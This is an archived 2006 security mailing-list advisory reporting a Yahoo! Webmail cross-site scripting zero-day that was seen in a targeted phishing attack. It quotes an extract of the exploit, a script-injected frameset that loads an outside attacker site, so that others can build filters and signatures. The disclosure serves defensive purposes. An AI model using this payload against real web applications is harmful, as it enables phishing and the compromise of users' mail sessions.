lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20060417190234.20495.qmail@web54410.mail.yahoo.com>
Date: Mon, 17 Apr 2006 12:02:34 -0700 (PDT)
From: Cesar <cesarc56@...oo.com>
To: full-disclosure@...ts.grok.org.uk
Cc: bugtraq@...urityfocus.com
Subject: [Argeniss] Alert - Yahoo! Webmail XSS


Hi.

I just got a targeted phishing attack to one of my
Yahoo email accounts, what it´s insteresting it's that
the attack exploits a Yahoo! webmail 0day XSS
vulnerability. 
I'm trying to contact Yahoo right now but in the
meantime I thought it will be good to provide some
bits because the seriousness of this . 
When you browse a message on Yahoo! Webmail the XSS
exploit creates a frameset and redirects to
http://w00tynetwork.com/x/ ,it's interesting that the
address bar at IE dosn´t refresh to show the actual
URL, you can only see the redirection to
http://w00tynetwork.com/x/ on IE status bar if you
have it visible.
I don't know if this vulnerability is being exploited
on the wild since it was a targeted attack, I'm sure
about this because the content of the message.

Here is an extract from the exploit so you can start
build some signatures, filtering, etc.
-----------------------------------
(java/**/script:document.write('<frameset cols=100%
rows=100% border=0 frameboarder=0framespacing=0><frame
frameborder=0
src=http://w00tynetwork.com/x/></frameset>'))
-----------------------------------

I will provide full details later when Yahoo! fix the
issue.
If security vendors are insterested on full details
plese ask for them at info>at<argeniss>.<com

Cesar.


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ